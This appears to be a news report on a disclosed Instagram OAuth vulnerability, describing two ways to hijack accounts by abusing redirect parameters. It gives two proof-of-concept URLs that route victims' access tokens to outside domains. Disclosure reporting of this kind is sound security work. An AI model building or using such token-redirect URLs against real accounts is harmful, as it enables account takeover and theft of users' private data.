Hacking Instagram Accounts using OAuth vulnerability

'Nir Goldshlager' known as Facebook hacker and founder of Break Security , who reported many critical bugs in Facebook OAuth mechanism in past few months, today disclose a critical vulnerability in Instagram Oauth that allow an attacker to hack any account.

Succesful hack allows attacker to access private photos, ability to delete victim's photos and to edit comments and also the ability to post new photos.

Hacker explained that there are two ways to hack Instagram accounts using OAuth, first via Hijack Instagram accounts using the Instagram OAuth or Hijack Instagram accounts using the Facebook OAuth Dialog.

During his bug hunting Nir found loopholes in Instagram's security parameters i.e redirect_uri , that allows attacker to pass the access token to his own domain with mx as suffix i.e code straight to breaksec.com.mx.

POC : https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


In Second method, hacker Hijacks the Instagram accounts using the Facebook OAuth Dialog. "When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place. I discovered that an attacker can use virtually any domain in the redirect_uri, next parameter."

Here attacker can use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id to steal the access_token of victim's account.

POC: https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=https://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token



Old Finding by Nir:

1. Hacking Facebook users just from chat box using multiple vulnerabilities
2. Facebook OAuth flaw allows gaining full control over any Facebook account
3. Facebook hacking accounts using another OAuth vulnerability
4. URL Redirection flaw in Facebook apps push OAuth vulnerability again in action